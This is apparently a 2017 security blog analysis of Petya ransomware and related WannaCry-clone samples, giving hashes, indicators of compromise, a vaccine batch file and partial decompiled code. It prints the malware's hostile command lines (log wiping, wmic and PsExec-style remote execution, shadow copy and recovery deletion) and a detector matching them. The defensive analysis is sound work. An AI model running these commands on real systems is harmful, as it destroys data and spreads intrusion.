Saturday, July 1, 2017

Petya Ransomware Attack Wave

After the WannaCry ransomware attack, Petya ransomware arrives with a new wave of attacks. This campaign is currently under way and has already impacted companies in countries across the world, including Ukraine, Spain, Russia, the Netherlands, France, and India. Industries we know to have been hit by this cyber-attack include telecommunications, banking, transportation, life sciences, food & beverage, and power & utilities.
The criminals behind the ransomware demand a ransom of USD 300 in bitcoin, reportedly to be paid within three days, or else all files on the computer will be deleted (see screenshot below).

Possible mode of entry:
Petya's spreading mechanism is email spam carrying booby-trapped Office documents. These documents exploit the CVE-2017-0199 Office RTF vulnerability to download the installer, which in turn leads to execution of an SMB worm that spreads like WannaCry.
The description given for this CVE is:
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."

The generalized description is execution of arbitrary code by remote attackers using a crafted document. "Remote attackers" here means the mode of entry is email spam. We received samples for analysis, and based on our analysis we made the following findings.
Sample: SHA-256: 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
This sample is in fact well known, since many researchers have already published their opinions on it. So while doing our manual analysis we simultaneously found automated analysis reports on online platforms. But the sample is a DLL file, so we chose to continue our manual analysis. During our analysis we also received another DLL sample:
SHA 256: 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
We compared the compilation times of the two samples and found the timestamps to be very similar.

The file properties are almost the same, and checking the imported libraries confirmed it: both files show the same behavior.
crypt32.dll      Crypto API32
iphlpapi.dll     IP Helper API
ws2_32.dll       Windows Socket 2.0 32-Bit DLL
mpr.dll          Multiple Provider Router DLL
netapi32.dll     Net Win32 API DLL
dhcpsapi.dll     DHCP Server API Stub DLL
The above DLLs are used by the ransomware samples for encryption, downloading, and so on. Our interest goes to the Crypto API, from which the functions CryptBinaryToStringW, CryptStringToBinaryW and CryptDecodeObjectEx are called. These functions convert byte arrays to and from formatted strings and decode encoded objects. Looking further into the strings of the file, we noticed the encryption-related strings:
·         CryptReleaseContext
·         CryptAcquireContext
·         CryptGenRandom
·         CryptExportKey
·         CryptAcquireContext
·         CryptSetKeyParam
·         CryptImportKey
·         CryptEncrypt
·         CryptGenKey
·         CryptDestroyKey
After that we looked at some very interesting strings:
·         Microsoft Enhanced RSA and AES Cryptographic Provider
·         README.TXT
·         kernel32.dll
·         iphlpapi.dll
·         SeTcbPrivilege
·         SeShutdownPrivilege
·         SeDebugPrivilege
·         ComSpec
·         \cmd.exe
·         wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D
·         dllhost.dat
·         wbem\wmic.exe
·         process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1

Since this is a DLL file (not a COM DLL), it has to be invoked via rundll32.exe. No ordinary user is going to call rundll32.exe to execute a DLL; a normal user does not know how DLLs are executed, and DLLs are normally loaded by a parent executable. If we look into the code and strings, we can see the call to rundll32.exe and where our sample is stored.
·         00000001338C   00001001418C      0   ComSpec
·         00000001339C   00001001419C      0   \cmd.exe
·         0000000133B0   0000100141B0      0   wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
·         0000000134A8   0000100142A8      0   schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
·         000000013520   000010014320      0   at %02d:%02d %ws
·         000000013544   000010014344      0   shutdown.exe /r /f
·         00000001356C   00001001436C      0   /RU "SYSTEM"
·         00000001358C   00001001438C      0   dllhost.dat
·         0000000135FB   0000100143FB      0   u%s \\%s -accepteula -s
·         000000013630   000010014430      0   -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
·         0000000136A0   0000100144A0      0   wbem\wmic.exe
·         0000000136C0   0000100144C0      0   %s /node:"%ws" /user:"%ws" /password:"%ws"
·         000000013718   000010014518      0   process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
·         0000000137B4   0000100145B4      0   \\%s\admin$
·         0000000137CC   0000100145CC      0   \\%ws\admin$\%ws
·         000000015468   000010016C68      0   c:\Windows\
·         000000015480   000010016C80      0   rundll32.exe
·         000000016CD0   0000100184D0      0   rundll32.exe
·         000000016CF0   0000100184F0      0   c:\Windows\
In the above strings we clearly see "process call create", which invokes rundll32.exe by its physical location, and that in turn points to a file stored in the Windows folder. But this did not confirm whether this sample or some other file is the one executed. So I copied the DLL file to the Windows folder and executed the following command:
rundll32.exe <sample name.dll> #1
After that step, I referred to the code of the DLL and found the following:

So there is a connection between the file execution, schtasks and shutdown.exe. After executing the DLL, we saw that a scheduled task was added.

It created the task At1, scheduled for exactly one hour after the task's creation. Our guess was that this is for the shutdown call we saw in the previous screenshot.

Our analysis was correct: the scheduled task does shut down the system. After the restart it brings up the ransom note page:

So we cannot access our files; they are encrypted. Payment instructions, bitcoin wallet details and a blinking prompt to enter the purchased key are shown. We typed some random text and it threw an incorrect-key error.
Email address associated with this ransomware:
Current status of this email address:
Posteo is an email service provider offering paid email accounts. In this Petya ransomware case, the attackers used a Posteo address as the contact option. Posteo's abuse team checked it and blocked that contact address.
Hence paying the ransom gives no assurance that the victim will receive the decryption key from the attackers, since the attackers can no longer be contacted at that email address.
With this post we have collected the associated domains and IPs for detection purposes.
Ransomware spreading URLs:
·         benkow(.)cc
·         Coffeinoffice(.)xyz
·         french-cooking(.)com
·         sundanders(.)online
·         casconut(.)xyz
·         blumbeerg(.)xyz  
·         insurepol(.)in
·         whitefoam(.)org(.)uk
·         xfusion(.)co(.)uk  
·         affliates(.)in  
·         hyporus(.)in
·         dantan(.)club  
·         kababmachatu(.)xyz  
·         damodot(.)xyz 
·         ballotvize(.)xyz
Bitcoin address: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
C&C payment servers:
·         mischapuk6hyrn72(.)onion/
·         petya3jxfp2f7g3i(.)onion/
·         petya3sen7dyko2n(.)onion/
·         mischa5xyix2mrhd(.)onion/MZ2MMJ
·         mischapuk6hyrn72(.)onion/MZ2MMJ
·         petya3jxfp2f7g3i(.)onion/MZ2MMJ
·         petya3sen7dyko2n(.)onion/MZ2MMJ
Possible IP addresses:
·         185.165(.)29(.)78
·         84.200(.)16(.)242
·         111.90(.)139(.)247
·         95.141(.)115(.)108
·         89.146(.)220(.)134
Action steps:
Detection rules such as Snort and YARA signatures for this Petya variant are available from independent sources on the net. Apply those Snort rules to detect this ransomware attack. Blocking the ransomware spreading domains and IPs in the firewall and proxy will prevent the attack. We recommend blocking SMB and RDP (Remote Desktop Protocol) access to all computers from the internet: ports 445 and 139 for SMB and 3389 for RDP should be blocked. We request that all Windows systems be patched with the latest security updates, especially MS17-010.
The Petya vaccine is available as a batch file from Bleeping Computer:

Or you can copy the following batch file and save it as .bat:
@echo off
REM Administrative check from here:
REM Vaccination discovered by
REM Batch file created by Lawrence Abrams of @bleepincomputer @lawrenceabrams

echo Administrative permissions required. Detecting permissions...
net session >nul 2>&1

if %errorLevel% == 0 (
    if exist C:\Windows\perfc (
        echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya.
    ) else (
        echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc
        echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll
        echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat

        REM Make the vaccine files read-only so the malware cannot simply overwrite them.
        attrib +R C:\Windows\perfc
        attrib +R C:\Windows\perfc.dll
        attrib +R C:\Windows\perfc.dat

        echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya.
    )
) else (
    echo Failure: You must run this batch file as Administrator.
)
pause

Further Attack wave in Ukraine:
While writing this analysis report, we came to know about WannaCry-clone attacks happening in Ukraine. We got three samples for analysis:
Sample1: MD5: 0BDE638B274C7F9C6C356D3987ED1A2D
Sample2: MD5: 87BE992695B752D86AEAB1116EB5393F
Sample3: MD5: 5C7C894A1CCFD8C8E0F174B0149A6601

All three samples are .NET compiled files:

Reversing the samples for analysis:
These samples look as if they were compiled on Jan 1 2016, but when we searched those hashes on VirusTotal they appeared to have been uploaded only a couple of days back. So they are actually new samples, and the compile date seems to have been customised or modified by the malware author.

Sample one shows WannaCry strains inside the code. We manually checked the other two samples too, and they have the same strains in the code. We successfully recovered the code of these samples.
Please find the program below:
internal class Program
{
    public static string DEMO_KEY_PRIVATE = "…";   // private key string not reproduced here
    public static string DEMO_KEY_PUBLIC = "BgIAAACkAABSU0ExAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3";
    public static string DEMO_EXTENSIONS = "jpg,jpeg,png,tif,gif,bmp";
    public static string ENCRYPTION_TOOL_FNAME = "ed.exe";
    public static string ENCRYPTED_PRIVATE_KEY_FNAME = "key.encrypted";
    public static string[] ALL_EXTENSIONS = new string[]
    {
        // extension list not reproduced here
    };
    public static List<string> ListDrives()
    {
        DriveInfo[] arg_0B_0 = DriveInfo.GetDrives();
        List<string> list = new List<string>();
        DriveInfo[] array = arg_0B_0;
        for (int i = 0; i < array.Length; i++)
        {
            DriveInfo driveInfo = array[i];
            if (driveInfo.DriveType == DriveType.Fixed || driveInfo.DriveType == DriveType.Removable || driveInfo.DriveType == DriveType.Network)
            {
                // loop body not reproduced here
            }
        }
        return list;
    }
}
The above code snippet deals with the keys, the targeted file extensions and details of the encryption tool. We moved on to the next sample; it contains resources in the form of images for the bitcoin details and the ransom note.
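The DEMO_KEY_PUBLIC string above is a base64-encoded CryptoAPI PUBLICKEYBLOB: an 8-byte BLOBHEADER, a 12-byte RSAPUBKEY header ("RSA1" magic, bit length, public exponent) and then the modulus in little-endian byte order. As an added example, not code from the post or from the sample, the following Python parses that blob from the post to recover the key size, exponent and modulus, and re-encodes the key as PKCS#1 PEM so it can be inspected with standard tooling. The only input is the DEMO_KEY_PUBLIC string reproduced from the post above; the constants are the documented wincrypt.h values.

```python
import base64
import struct

# Public key exactly as embedded in the first .NET sample (DEMO_KEY_PUBLIC above).
DEMO_KEY_PUBLIC = "BgIAAACkAABSU0ExAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3"

# CryptoAPI constants from wincrypt.h.
PUBLICKEYBLOB = 0x06          # BLOBHEADER.bType for a public key blob
CALG_RSA_KEYX = 0x0000A400    # RSA key-exchange algorithm id
CALG_RSA_SIGN = 0x00002400    # RSA signature algorithm id
RSA1_MAGIC = b"RSA1"          # RSAPUBKEY.magic for a public key


def parse_publickeyblob(b64):
    """Parse a base64 CryptoAPI RSA PUBLICKEYBLOB and return its fields as a dict."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) < 20:
        raise ValueError("blob shorter than BLOBHEADER + RSAPUBKEY")
    # BLOBHEADER: bType (1), bVersion (1), reserved (2), aiKeyAlg (4), all little-endian.
    btype, bversion, _reserved, alg = struct.unpack_from("<BBHI", raw, 0)
    # RSAPUBKEY: magic (4), bitlen (4), pubexp (4).
    magic, bitlen, pubexp = struct.unpack_from("<4sII", raw, 8)
    if btype != PUBLICKEYBLOB or magic != RSA1_MAGIC:
        raise ValueError("not an RSA PUBLICKEYBLOB")
    if alg not in (CALG_RSA_KEYX, CALG_RSA_SIGN):
        raise ValueError("unexpected aiKeyAlg 0x%08x" % alg)
    nbytes = bitlen // 8
    if len(raw) != 20 + nbytes:
        raise ValueError("expected %d bytes, got %d" % (20 + nbytes, len(raw)))
    # CryptoAPI stores the modulus least-significant byte first.
    modulus = int.from_bytes(raw[20:20 + nbytes], "little")
    return {"version": bversion, "alg": alg, "bits": bitlen,
            "exponent": pubexp, "modulus": modulus}


def _der_length(n):
    """DER length octets (short form below 128, long form otherwise)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_integer(value):
    """DER INTEGER for a non-negative value, with a leading zero if the top bit is set."""
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:
        body = b"\x00" + body
    return b"\x02" + _der_length(len(body)) + body


def to_pkcs1_der(modulus, exponent):
    """RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    body = _der_integer(modulus) + _der_integer(exponent)
    return b"\x30" + _der_length(len(body)) + body


def to_pkcs1_pem(modulus, exponent):
    """Wrap the PKCS#1 DER in the PEM armour understood by openssl rsa -RSAPublicKey_in."""
    b64 = base64.b64encode(to_pkcs1_der(modulus, exponent)).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN RSA PUBLIC KEY-----\n" + "\n".join(lines) +
            "\n-----END RSA PUBLIC KEY-----\n")


if __name__ == "__main__":
    info = parse_publickeyblob(DEMO_KEY_PUBLIC)
    print("RSA-%d, e=%d, alg=0x%08x" % (info["bits"], info["exponent"], info["alg"]))
    print(to_pkcs1_pem(info["modulus"], info["exponent"]))
```

Recovering the modulus this way lets an analyst compare the embedded key across samples (the same modulus in several files points to one build or one actor) without running the malware, and the PEM output can be fed to openssl for the same comparison.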
internal static Bitmap wannacry
{
    get
    {
        return (Bitmap)Resources.ResourceManager.GetObject("wannacry", Resources.resourceCulture);
    }
}

Now we move to our final sample. The code is very interesting.
// ed.CryptoFile
private static string[] _exProcesses = new string[]
{
    // process names not reproduced here
};
This sample checks for the presence of anti-malware products on the system. Further on we see the AES-related code:
using (AesManaged aesManaged = new AesManaged())
{
    aesManaged.Mode = CipherMode.CBC;
    aesManaged.KeySize = 256;
    aesManaged.Key = key;
    aesManaged.IV = iv;
}
We shortened the CryptoFile class to the following snippet:
public static class CryptoFile
{
    public static long CRYPT_BYTES = 5242880L;
    private static bool KillFileLockProcess(string path)
    public static bool Encrypt(string path, byte[] publicKeyBlob)
    public static bool Decrypt(string path, byte[] privateKeyBlob)
}
It also contains code to delete volume shadow copies, as follows:
if (!(text == "-delshadowcopies"))
{
    goto IL_52B;
}
PS.ExecuteAndForget("cmd.exe", "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog –quiet");
goto IL_52B;
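The command lines recovered in this post (the wevtutil/fsutil log cleanup and scheduled forced reboot from the Petya DLL strings, rundll32 launching a DLL from C:\Windows with ordinal #1, wmic "process call create" against remote nodes, the PsExec-style "-accepteula -s" invocation, and the shadow copy and recovery deletion from the .NET sample) are all visible in process creation telemetry. As an added example, not part of the original post, here is a Python detector that runs those patterns over process creation log lines. The log format, hostnames, users and internal addresses are constructed for the example; perfc.dat is used as the DLL name only because it is the file name the vaccine batch file above creates.

```python
import re

# Detection rules derived from the strings recovered above: (name, pattern, severity).
RULES = [
    ("eventlog_clear",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\s+", re.I), "high"),
    ("usn_journal_delete",
     re.compile(r"\bfsutil(\.exe)?\s+usn\s+deletejournal\b", re.I), "high"),
    ("scheduled_forced_reboot",
     re.compile(r"\b(schtasks|at)(\.exe)?\b.*\bshutdown(\.exe)?\s+/r\b", re.I), "high"),
    ("rundll32_windows_dir_ordinal",
     re.compile(r'\brundll32(\.exe)?\s+\\?"?C:\\Windows\\[^\\"\s]+\\?"?\s*,?\s*#1\b', re.I), "medium"),
    ("wmic_remote_process_create",
     re.compile(r"\bwmic(\.exe)?\b.*/node:.*\bprocess\s+call\s+create\b", re.I), "high"),
    ("psexec_style_remote_exec",
     re.compile(r"\\\\\S+\s+-accepteula\s+-s\b", re.I), "medium"),
    ("shadow_copy_delete",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b|\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I), "high"),
    ("recovery_disable",
     re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b|\bwbadmin(\.exe)?\s+delete\s+catalog\b", re.I), "high"),
]

# One process creation event per line: timestamp, host, user, then the full command line.
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmdline=(?P<cmd>.*)$")

# Constructed sample log (hosts, users, addresses and the password placeholder are made up).
SAMPLE_PROCESS_LOG = r"""
2017-06-27T10:20:01Z host=WS01 user=CORP\alice cmdline=C:\Windows\System32\svchost.exe -k netsvcs
2017-06-27T10:21:13Z host=WS01 user=SYSTEM cmdline=cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
2017-06-27T10:21:14Z host=WS01 user=SYSTEM cmdline=schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 11:21
2017-06-27T10:21:20Z host=WS01 user=SYSTEM cmdline=C:\Windows\System32\rundll32.exe "C:\Windows\perfc.dat",#1
2017-06-27T10:21:25Z host=WS01 user=SYSTEM cmdline=wmic.exe /node:"10.1.4.23" /user:"CORP\svc01" /password:"<constructed>" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1"
2017-06-27T10:22:02Z host=WS02 user=SYSTEM cmdline=cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
2017-06-27T10:23:40Z host=WS03 user=CORP\bob cmdline="C:\Program Files\Vendor\updater.exe" /silent
""".strip("\n")


def scan_process_log(text):
    """Return one alert dict per (line, rule) match, in log order; unparsable lines are skipped."""
    alerts = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        for name, pattern, severity in RULES:
            if pattern.search(cmd):
                alerts.append({"line": n, "host": m.group("host"), "user": m.group("user"),
                               "rule": name, "severity": severity, "cmdline": cmd})
    return alerts


def hosts_by_severity(alerts, severity="high"):
    """Distinct hosts that raised at least one alert of the given severity."""
    return sorted({a["host"] for a in alerts if a["severity"] == severity})


if __name__ == "__main__":
    found = scan_process_log(SAMPLE_PROCESS_LOG)
    for a in found:
        print("line %(line)d %(host)s [%(severity)s] %(rule)s: %(cmdline)s" % a)
    print("hosts needing isolation:", hosts_by_severity(found))
```

Several of these rules (event log clearing, USN journal deletion, shadow copy deletion) have legitimate administrative uses, so a single hit is a triage lead; the combination seen here on one host within a minute is what makes the pattern conclusive.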

The recent campaign of ransomware attacks gives numerous indications that it might be the work of organised threat actors or a state-sponsored attack. Ukraine was specifically targeted in the last couple of weeks. Proper countermeasures, periodic patching, and timely assessment of host compromise, network compromise and vulnerabilities can put an organisation on the safer side.

1 comment:

neo said...

wonderful analysis #petya ransomware and #wannacry ransomware.
